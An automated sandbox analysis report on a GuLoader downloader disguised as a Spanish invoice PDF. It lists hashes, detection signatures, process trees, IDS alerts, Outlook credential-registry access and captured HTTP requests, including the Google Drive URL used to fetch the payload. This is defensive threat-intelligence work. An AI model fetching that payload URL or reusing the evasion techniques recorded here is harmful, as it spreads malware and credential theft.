Windows Analysis Report
rFACTURA_FAC_2023_1-1000733.PDF.exe

Overview

General Information

Sample Name:rFACTURA_FAC_2023_1-1000733.PDF.exe
Analysis ID:830399
MD5:a6ef5ed777ba7369c2bb28e46b198ba6
SHA1:f707bc0343f41d95f57e776a9f85f6a2c5791aa7
SHA256:878d710875b07ec61bef0b198ba67bf81ad0730a3a483d5762cd18e13fb4b525

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
May check the online IP address of the machine
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • rFACTURA_FAC_2023_1-1000733.PDF.exe (PID: 8312 cmdline: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe MD5: A6EF5ED777BA7369C2BB28E46B198BA6)
    • CasPol.exe (PID: 6576 cmdline: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 8568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
          No Sigma rule has matched
          Timestamp:03/20/23-11:06:12.385242
          Source IP:192.168.11.20
          Destination IP:132.226.8.169
          SID:2039190
          Source Port:49801
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe Virustotal: Detection: 20%
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Replyingly\Avnbgen\Spisekamrenes
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49800 version: TLS 1.2
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: @cn.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: mscorlib.pdb| source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: Microsoft.VisualBasic.pdb)Q source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.0.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.0.dr
          Source: Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
          Source: Binary string: C:\Windows\caspol.pdbpdbpol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\exe\caspol.pdby33o source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\symbols\exe\caspol.pdbd source: CasPol.exe, 0000000B.00000002.1859898012.0000000003AEF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: ;6##.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.Core.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: mscorlib.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdbRSDSrMV9 source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdbGhY source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.pdbp source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: bwcaspol.PDB 8: source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\net6.0-Release\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: \??\C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ?cnC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBFiV source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.pdbSystem.Core.dll source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: 3symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: 96HPWn,C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdbp source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4x nop then jmp 341978CCh11_2_34196DDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_34196933
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_34196B14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_34196300

          Networking

          Source: Traffic Snort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.11.20:49801 -> 132.226.8.169:80
          Source: unknown DNS query: name: checkip.dyndns.org
          Source: Joe Sandbox View ASN Name: UTMEMUS UTMEMUS
          Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
          Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: drive.google.com
            Cache-Control: no-cache
          Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Cache-Control: no-cache
            Host: doc-0s-a8-docs.googleusercontent.com
            Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: CasPol.exe, 0000000B.00000002.1876903989.0000000034291000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#Attribution
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#Distribution
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#Notice
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#Reproduction
          Source: battery-level-90-charging-symbolic.svg.0.drString found in binary or memory: http://creativecommons.org/ns#ShareAlike
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
          Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003A94000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003AAA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
          Source: CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://subca.ocsp-certum.com01
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://subca.ocsp-certum.com02
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://subca.ocsp-certum.com05
          Source: Amcache.hve.LOG1.15.dr, Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeString found in binary or memory: http://www.certum.pl/CPS0
          Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/#
          Source: CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/2
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08kQ
          Source: CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08ktsv
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.Primitives.dll.0.dr, System.Reflection.TypeExtensions.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.TypeExtensions.dll.0.drString found in binary or memory: https://github.com/dotnet/runtimeBSJB
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00405402 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405402

          System Summary

          Source: initial sampleStatic PE information: Filename: rFACTURA_FAC_2023_1-1000733.PDF.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2500
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_00404C3F0_2_00404C3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_341934F211_2_341934F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_34196DDF11_2_34196DDF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_3419485811_2_34194858
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_341920D811_2_341920D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_341962EF11_2_341962EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_3419630011_2_34196300
          Source: System.Reflection.TypeExtensions.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe File read: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
          Source: rFACTURA_FAC_2023_1-1000733.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe File created: C:\Users\user\AppData\Local\Temp\nsz1C6D.tmp
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/21@3/3
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004020FE
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_004046C3 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6576
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Binary string: ?cnC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBFiV source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: System.pdbSystem.Core.dll source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: 3symbols\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: 96HPWn,C:\Windows\caspol.pdb source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2B2E.tmp.dmp.15.dr
          Source: Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdbp source: CasPol.exe, 0000000B.00000002.1875353906.0000000033F87000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\exe\caspol.pdb source: CasPol.exe, 0000000B.00000002.1880395156.0000000036380000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara matchFile source: 00000000.00000002.1415606595.0000000005E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1415606595.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1786467995.0000000000FC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr, type: DROPPED
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B4C0D push edi; iretd 0_2_048B4C0E
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B4C15 push edi; iretd 0_2_048B4C16
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B5A6C push cs; ret 0_2_048B5A71
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B2072 push FFFFFF83h; retf 0_2_048B209F
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B7C71 push es; iretd 0_2_048B7C74
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B4BAE push edi; iretd 0_2_048B4BBA
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B4BC1 push edi; iretd 0_2_048B4BC2
          Source: C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exeCode function: 0_2_048B71FA push esi; ret 0_2_048B71FD
